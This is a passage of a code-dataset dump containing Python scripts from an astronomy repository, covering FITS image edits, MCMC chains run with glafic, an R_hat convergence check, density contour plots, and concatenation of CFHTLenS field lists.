When the pipeline says Select Object --> type a , Quit --> type q on the ds9 image: I need to press first a than q on the same frame\n" }, { "alpha_fraction": 0.6148409843444824, "alphanum_fraction": 0.7067137956619263, "avg_line_length": 22.5, "blob_id": "0fe1de90acda662943345797804cf0deea2f2cc8", "content_id": "56fd20d930fd13a263d969de472bb73b97b57666", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 51, "num_lines": 12, "path": "/python/image_utilities/replaceregioninsidemultiextension.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Replace\n\nimport numpy as np\nfrom astropy.io import fits\n\norig = fits.open('patch.fits')\nreplace = fits.open('LR.20141121.11919_2_bin.fits')\norig_ = orig[4].data\nreplace_ = replace[0].data\norig_[0:2058,0:369] = replace_\norig[1].data = orig_\norig.writeto('patch.fits',clobber=True)\n\n" }, { "alpha_fraction": 0.5648224353790283, "alphanum_fraction": 0.60748690366745, "avg_line_length": 51.411766052246094, "blob_id": "5e4fa825d630b225e07a75860f44b7af3c8d44ee", "content_id": "dc4b07a254951a1a7564d6295e24b177dd2b5462", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3633, "license_type": "no_license", "max_line_length": 355, "num_lines": 68, "path": "/python/modeling_utilities/mcmc_glafic.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given the best-fit input file from glafic, run 10 mcmc chains, combine them (accounting for burn-in) and plot the histogram with the 16th and 84th percentiles, using the corner package. It also computes the R_hat convergence diagnostic.\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\r\nfile = \"point1pertSIEgamma.input\"\r\nlength = 400000\n\r\nfor i in range(10): #10\r\n os.system(\"cp %s %s\" % (file,file[:-6] + str(i+1) + \".input\"))\r\n with open(file[:-6] + str(i+1) + \".input\", 'r') as f:\r\n glafic = f.readlines()\r\n glafic[10 - 1] = \"prefix %s\" % file[:-6] + str(i+1) + \"\\n\"\r\n glafic[20 - 1] = \"ran_seed -%s\" % str(i+1) + \"\\n\"\r\n glafic[55 - 1] = \"mcmc %s\" % str(length) + \"\\n\"\r\n with open(file[:-6] + str(i+1) + \".input\", 'w') as f:\r\n f.writelines(glafic)\r\n f.close()\r\n\r\nos.system(\"glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s & glafic %s\" % (file[:-6] + \"1.input\",file[:-6] + \"2.input\",file[:-6] + \"3.input\",file[:-6] + \"4.input\",file[:-6] + \"5.input\",file[:-6] + \"6.input\",file[:-6] + \"7.input\",file[:-6] + \"8.input\",file[:-6] + \"9.input\",file[:-6] + \"10.input\"))\r\n\r\nfor i in range(10):#10\r\n mcmc = np.loadtxt(file[:-6] + str(i+1) + \"_mcmc.dat\",unpack=True)\r\n mcmci = mcmc[1:,int(np.shape(mcmc)[1]/4):np.shape(mcmc)[1]] # eliminate the first column, containing chi^2, as well as the first 25% of the chains\r\n if i == 0: mcmcfinal = mcmci\r\n else: mcmcfinal = np.append(mcmcfinal,mcmci, axis = 1)\r\n\r\n if i == 0: mcmc0 = mcmci\r\n if i == 1: mcmc1 = mcmci\r\n if i == 2: mcmc2 = mcmci\r\n if i == 3: mcmc3 = mcmci\r\n if i == 4: mcmc4 = mcmci\r\n if i == 5: mcmc5 = mcmci\r\n if i == 6: mcmc6 = mcmci\r\n if i == 7: mcmc7 = mcmci\r\n if i == 8: mcmc8 = mcmci\r\n if i == 9: mcmc9 = mcmci\r\n\r\n# Convergence diagnostics with Gelman-Rubin 1995 R_hat\r\ndef R_hat(samples): # https://groups.google.com/forum/#!topic/hddm-users/qWzCWTz-wFQ # formulas in 
https://pymc-devs.github.io/pymc/modelchecking.html\r\n m, n = np.shape(samples) # m = chains, n = samples\r\n # Chain variance\r\n chain_var = np.var(samples, axis=1, ddof=1) # degrees of freedom = n-ddof\r\n # Within-chain variance (mean of variances of each chain)\r\n W = 1./m * np.sum(chain_var)\r\n # Chain means\r\n chain_means = np.mean(samples, axis=1)\r\n # mean_of_means = numpy.mean(chain_means) # all chains have same length\r\n # Variance of chain means\r\n chain_means_var = np.var(chain_means, ddof=1)\r\n # Between-chain variance\r\n B = n * chain_means_var\r\n # Weighted average of within and between variance\r\n #(marginal posterior variance)\r\n Var_hat = (float(n-1)/n)*W + B/n\r\n # Potential scale reduction factor\r\n R_hat = np.sqrt(Var_hat / W)\r\n return R_hat\r\n\r\nminsize = np.min([np.shape(mcmc0)[1],np.shape(mcmc1)[1],np.shape(mcmc2)[1],np.shape(mcmc3)[1],np.shape(mcmc4)[1],np.shape(mcmc5)[1],np.shape(mcmc6)[1],np.shape(mcmc7)[1],np.shape(mcmc8)[1],np.shape(mcmc9)[1]])\r\nfor i in range(np.shape(mcmc)[0] - 1): # added -1\r\n samples = np.vstack((mcmc0[i][:minsize],mcmc1[i][:minsize],mcmc2[i][:minsize],mcmc3[i][:minsize],mcmc4[i][:minsize],mcmc5[i][:minsize],mcmc6[i][:minsize],mcmc7[i][:minsize],mcmc8[i][:minsize],mcmc9[i][:minsize]))\r\n print \"[%d] R_hat = \" %(i+1), R_hat(samples) # added +1\r\n\r\nfigure = corner.corner(mcmcfinal[0:np.shape(mcmcfinal)[0]].T, labels=np.linspace(1,np.shape(mcmcfinal)[0],np.shape(mcmcfinal)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\r\nfigure.savefig(file[:-6] + \"_mcmc.png\", dpi=100)\r\n\r\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7206896543502808, "avg_line_length": 21.230770111083984, "blob_id": "5cc24528abe92196382b01d25542b68f2a0b8d68", "content_id": "068d81de38ee0d908c19eaa45a1c447d24a4bd37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 45, "num_lines": 13, "path": "/python/image_utilities/normalize.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple code to normalize an image\n\nimport numpy as np\nfrom astropy.io import fits\nimport sys\n\nimage = fits.open(str(sys.argv[1]))\ndata = image[0].data\nsum = np.sum(image[0].data)\ndata = image[0].data/sum\nimagex = image\nimagex[0].data = data\nimagex.writeto(str(sys.argv[2]),clobber=True)\n\n" }, { "alpha_fraction": 0.5884048342704773, "alphanum_fraction": 0.6128157377243042, "avg_line_length": 41.290321350097656, "blob_id": "bdab8f94e2c0fe1be610c1131f2d662f9818d9dd", "content_id": "6c8f00bceb3c81e83882b2263e6f8c4d45a5711f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11798, "license_type": "no_license", "max_line_length": 132, "num_lines": 279, "path": "/python/plot_utilities/density_contour.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.optimize as so\n\ndef find_confidence_interval(x, pdf, confidence_level):\n return pdf[pdf > x].sum() - confidence_level\n\ndef density_contour(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n\n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If 
supplied, plot the contour to this axis. Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n\n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n\n pdf = (H*(x_bin_sizes*y_bin_sizes))\n\n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels = [one_sigma, two_sigma, three_sigma]\n\n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour = plt.contour(X, Y, Z, levels=levels, origin=\"lower\", colors=('red','magenta','blue'), linewidths = 0.7)\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour = ax.contour(X, Y, Z, levels=levels, origin=\"lower\", colors=('red','magenta','blue'), linewidths = 0.7)\n\n return contour\n\ndef density_contourdash(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n\n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n\n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n\n pdf = (H*(x_bin_sizes*y_bin_sizes))\n\n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels1 = [one_sigma]\n levels2 = [two_sigma]\n levels3 = [three_sigma]\n\n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = plt.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'solid')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = ax.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'solid')\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = plt.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'dashed')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = ax.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'dashed')\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = plt.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'dotted')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = ax.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('black'), linewidths = 0.7, linestyles = 'dotted')\n\n return contour1,contour2,contour3\n\ndef density_contourdashmagenta(xdata, ydata, 
nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n \n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n \n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n \n pdf = (H*(x_bin_sizes*y_bin_sizes))\n \n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels1 = [one_sigma]\n levels2 = [two_sigma]\n levels3 = [three_sigma]\n \n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = plt.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'solid')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = ax.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'solid')\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = plt.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'dashed')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = ax.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'dashed')\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = plt.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'dotted')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = ax.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('magenta'), linewidths = 0.7, linestyles = 'dotted')\n \n return contour1,contour2,contour3\n\ndef density_contourdashblue(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n \n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. 
Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n \n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n \n pdf = (H*(x_bin_sizes*y_bin_sizes))\n \n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels1 = [one_sigma]\n levels2 = [two_sigma]\n levels3 = [three_sigma]\n \n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = plt.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'solid')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = ax.contour(X, Y, Z, levels=levels1, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'solid')\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = plt.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'dashed')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = ax.contour(X, Y, Z, levels=levels2, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'dashed')\n \n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = plt.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'dotted')\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = ax.contour(X, Y, Z, levels=levels3, origin=\"lower\", colors=('blue'), linewidths = 0.7, linestyles = 'dotted')\n \n return contour1,contour2,contour3\n\ndef density_contourfill(xdata, ydata, nbins_x, nbins_y, ax=None, **contour_kwargs):\n \"\"\" Create a density contour plot.\n\n Parameters\n ----------\n xdata : numpy.ndarray\n ydata : numpy.ndarray\n nbins_x : int\n Number of bins along x dimension\n nbins_y : int\n Number of bins along y dimension\n ax : matplotlib.Axes (optional)\n If supplied, plot the contour to this axis. 
Otherwise, open a new figure\n contour_kwargs : dict\n kwargs to be passed to pyplot.contour()\n \"\"\"\n\n H, xedges, yedges = np.histogram2d(xdata, ydata, bins=(nbins_x,nbins_y), normed=True)\n x_bin_sizes = (xedges[1:] - xedges[:-1]).reshape((1,nbins_x))\n y_bin_sizes = (yedges[1:] - yedges[:-1]).reshape((nbins_y,1))\n\n pdf = (H*(x_bin_sizes*y_bin_sizes))\n\n one_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.68))\n two_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.95))\n three_sigma = so.brentq(find_confidence_interval, 0., 1., args=(pdf, 0.99))\n levels1 = [one_sigma,0]\n levels2 = [two_sigma,one_sigma]\n levels3 = [three_sigma,two_sigma]\n\n X, Y = 0.5*(xedges[1:]+xedges[:-1]), 0.5*(yedges[1:]+yedges[:-1])\n Z = pdf.T\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = plt.contourf(X, Y, Z, levels=levels1, origin=\"lower\", colors=('black'))\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour1 = ax.contourf(X, Y, Z, levels=levels1, origin=\"lower\", colors=('black'))\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = plt.contourf(X, Y, Z, levels=levels2, origin=\"lower\", colors=('gray'))\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour2 = ax.contourf(X, Y, Z, levels=levels2, origin=\"lower\", colors=('gray'))\n\n if ax == None:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = plt.contourf(X, Y, Z, levels=levels3, alpha=0.5, origin=\"lower\", colors=('gray'))\n else:\n #plt.rcParams['contour.negative_linestyle'] = 'solid'\n contour3 = ax.contourf(X, Y, Z, levels=levels3, alpha=0.5, origin=\"lower\", colors=('gray'))\n\n return contour1,contour2,contour3\n\n\n\n#def test_density_contour():\n# norm = np.random.normal(10., 15., size=(12540035, 2))\n# density_contour(norm[:,0], norm[:,1], 100, 100)\n# plt.show()\n\n#test_density_contour()" }, { "alpha_fraction": 0.6813559532165527, "alphanum_fraction": 0.7152542471885681, "avg_line_length": 31.77777862548828, "blob_id": "5153b773d44fd56b78e4d2dbcebdda294bccc77e", "content_id": "74e7b350da811edf4d62b49644a0692ac2057e86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 295, "license_type": "no_license", "max_line_length": 62, "num_lines": 9, "path": "/python/image_utilities/mask_repair.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script to change pixel values in custom regions\n\nimport numpy as np\nfrom astropy.io import fits\n\nimage = fits.open(\"ch2_4amin_nolens.fits\")\nimagem = fits.open(\"msk.fits\")\nimage[0].data[(imagem[0].data == 1) & (image[0].data < 0)] = 0\nimage.writeto(\"ch2_4amin_nolens.fits\",clobber=True)\n" }, { "alpha_fraction": 0.5420274138450623, "alphanum_fraction": 0.6463176608085632, "avg_line_length": 79.95619201660156, "blob_id": "bdedd6f635a4fb329f54f1317b82ef67ab7e7bf0", "content_id": "6ea53a1b1cb63cbd4cf95ee3a07d371a35c9fb35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149688, "license_type": "no_license", "max_line_length": 190, "num_lines": 1849, "path": "/python/weightingsizeplotsuniversal.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# usage: use one of the following arguments: lens name, orig or samp, followed by 
\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n#import scipy\n#from scipy import special\n#from astropy.io import fits\n#from astropy.wcs import WCS\n#from astropy import units as u\n#from astropy.coordinates import SkyCoord\n#from astropy.io import ascii\n#from astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\n#from numpy.random import normal\n#from scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nprint(\"Arguments: \\n Lens field: %s \\n Original values or samples drawn from P(z) and P(Mstar): %s \\n Limiting i-band magnitude: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3])))\n\nif str(sys.argv[2]) == \"samp\":\n print(\"This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000...\")\n start_time = time.time()\n\nwith open('fieldsforhist50try_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size90_i%s.lst' % 
(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size90_i%s.lst' % 